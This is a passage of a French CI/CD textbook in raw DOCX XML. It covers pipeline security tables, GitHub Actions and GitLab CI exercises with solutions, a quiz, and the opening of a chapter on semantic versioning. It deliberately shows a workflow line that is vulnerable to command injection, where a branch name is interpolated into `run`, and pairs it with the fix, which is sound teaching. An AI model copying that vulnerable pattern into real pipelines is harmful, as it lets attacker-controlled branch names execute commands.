          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2743"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jeton trop large</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3397"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>contents: write</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>permissions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> minimales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="274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Injection de commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="339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Titre de branche dans un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Variables d'environnement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2743"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Runner partagé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3397"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Persistance entre exécutions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Runner éphémère</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une injection évitée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Ne jamais interpoler une entrée utilisateur dans un script</w:t>
        <w:br/>
        <w:t># Dangereux :</w:t>
        <w:br/>
        <w:t>- run: echo "Branche ${{ github.head_ref }}"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Sûr :</w:t>
        <w:br/>
        <w:t>- run: echo "Branche $BRANCHE"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  env:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    BRANCHE: ${{ github.head_ref }}</w:t>
        <w:br/>
        <w:br/>
        <w:t># Et vérifier la valeur si elle influence le comportement</w:t>
        <w:br/>
        <w:t>- run: |</w:t>
        <w:br/>
        <w:t xml:space="preserve">    case "$BRANCHE" in</w:t>
        <w:br/>
        <w:t xml:space="preserve">      main|develop|feature/*) echo "ok" ;;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      *) echo "nom de branche refusé" &gt;&amp;2; exit 1 ;;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    esac</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LES SECRETS NE SONT PAS VISIBLES DES CONTRIBUTIONS EXTERNES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Sur une demande de fusion venant d'un dépôt forké, les secrets ne sont pas transmis. C'est voulu. Ne cherchez pas à contourner cette règle avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>pull_request_target</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et un script exécutable issu de la contribution.</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CHECKLIST DE PIPELINE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>permissions: contents: read</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> par défaut.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Actions épinglées par version ou empreinte.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 xml:space="preserve">Aucune entrée utilisateur interpolée dans un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>run</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Secrets disponibles uniquement sur les branches protégées.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Durée maximale définie par tâche.</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workflow GitHub est un ensemble de tâches exécutées par des runners.</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permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> limite les droits du jeton d'exécution.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actions se épinglent par version, ou par empreinte en critique.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matrice teste plusieurs combinaisons.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cache accélère, l'artefact transporte.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GitLab CI ordonne les jobs par étapes.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Les workflows réutilisables et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évitent la duplication.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secrets ne sont pas exposés aux contributions externes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le pipeline produit un artefact. Le chapitre suivant organise la publication des versions et la traçabilité.</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79.1 — Écrire un workflow complet</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 projet Node doit être vérifié et son rapport conservé.</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Déclarez les déclencheurs.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Limitez les permissions.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Publiez le rapport même en cas d'échec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 79.2 — Transposer vers GitLab</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Le même contrôle doit tourner dans GitLab CI.</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Déclarez les étapes.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Configurez le cache.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Publiez les rapports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 79.3 — Corriger une injection de commande</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un pipeline construit une image avec le nom de branche.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Repérez l'interpolation.</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Passez par une variable.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Validez le nom.</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79.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>name: CI</w:t>
        <w:br/>
        <w:t>on: [pull_request, push]</w:t>
        <w:br/>
        <w:br/>
        <w:t>permissions:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  contents: read</w:t>
        <w:br/>
        <w:br/>
        <w:t>jobs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  verifier:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    runs-on: ubuntu-24.04</w:t>
        <w:br/>
        <w:t xml:space="preserve">    timeout-minutes: 15</w:t>
        <w:br/>
        <w:t xml:space="preserve">    steps:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: actions/checkout@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: actions/setup-node@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">        with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          node-version: 22</w:t>
        <w:br/>
        <w:t xml:space="preserve">          cache: npm</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - run: npm ci</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - run: npm run lint</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - run: npm test -- --reporter=junit --output-file=rapports/junit.xml</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: actions/upload-artifact@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if: always()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          name: rapport-tests</w:t>
        <w:br/>
        <w:t xml:space="preserve">          path: rapports/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>if: always()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> garantit que le rapport est publié même quand les tests échouent : c'est précisément là qu'il est utile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>timeout-minutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite qu'une tâche bloquée consomme le quota.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 79.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>stages: [lint, test]</w:t>
        <w:br/>
        <w:br/>
        <w:t>default:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  image: node:22-alpine</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cache:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    key:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      files: [package-lock.json]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    paths: [.npm/]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  before_script:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - npm ci --prefer-offline</w:t>
        <w:br/>
        <w:br/>
        <w:t>lint:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  stage: lint</w:t>
        <w:br/>
        <w:t xml:space="preserve">  script: npm run lint</w:t>
        <w:br/>
        <w:br/>
        <w:t>test:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  stage: test</w:t>
        <w:br/>
        <w:t xml:space="preserve">  script: npm test</w:t>
        <w:br/>
        <w:t xml:space="preserve">  artifacts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    when: always</w:t>
        <w:br/>
        <w:t xml:space="preserve">    reports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      junit: rapports/junit.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les rapports JUnit s'affichent directement dans l'interface de fusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cache est partagé entre les jobs grâce à la même clé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 79.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Avant</w:t>
        <w:br/>
        <w:t># - run: docker build -t app:${{ github.head_ref }} .</w:t>
        <w:br/>
        <w:br/>
        <w:t># Après</w:t>
        <w:br/>
        <w:t>- run: |</w:t>
        <w:br/>
        <w:t xml:space="preserve">    nom=$(echo "$BRANCHE" | tr '/' '-' | tr -cd 'a-zA-Z0-9._-')</w:t>
        <w:br/>
        <w:t xml:space="preserve">    test -n "$nom" || { echo "nom vide" &gt;&amp;2; exit 1; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    docker build -t "app:$nom" .</w:t>
        <w:br/>
        <w:t xml:space="preserve">  env:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    BRANCHE: ${{ github.head_ref }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un nom de branche peut contenir des caractères qui cassent la commande.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Filtrer et valider transforme une entrée hostile en valeur inoffensive.</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 xml:space="preserve">Que limite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>permissions</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La durée du pipeline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Les droits du jeton</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 nombre de runners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La taille du cache</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Quelle est la différence entre cache et artefact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Aucune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 cache peut être absent, l'artefact doit exister</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L'artefact est plus rapide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 cache est chiffré</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Comment ordonne-t-on les jobs GitLab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 xml:space="preserve">Par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>needs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 xml:space="preserve">Par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>stages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Par ordre alphabétique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Au hasard</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 xml:space="preserve">Pourquoi ne pas interpoler un nom de branche dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run</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Pour la lisibilité</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À cause du risque d'injection de commande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Pour économiser du cache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Ce n'est pas un problème</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Comment tester plusieurs versions d'un langage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Avec un cache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Avec une matrice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Avec un artefact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Avec un runner</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Le jeton GITHUB_TOKEN n'a que les droits déclarés.</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Un cache manquant ralentit, un artefact manquant bloque.</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Les jobs du même stage sont parallèles, les stages s'enchaînent.</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Une entrée utilisateur peut contenir des commandes arbitraires.</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La matrice génère une tâche par combinaison.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>80. Publications, versions et traçabilité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nommer, signer et publier un artefact pour savoir exactement ce qui tourne en production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Intermédiaire · Prérequis : chapitre 79</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Appliquer une version sémantique sans ambiguïté.</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Publier une image et un paquet avec métadonnées.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Signer et vérifier un artefact.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Écrire des notes de version utiles.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Retrouver la provenance d'un incident.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>80.1 Versionner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une version est un contrat. La version sémantique </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>MAJEUR.MINEUR.CORRECTIF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annonce la compatibilité : rompre ce contrat casse les dépendants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.304 — Quatre incréments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Partie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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Incrément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="368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Signification</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1.4.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1.5.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2322"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mineur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3688"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ajout compatible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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1.4.2</w:t>
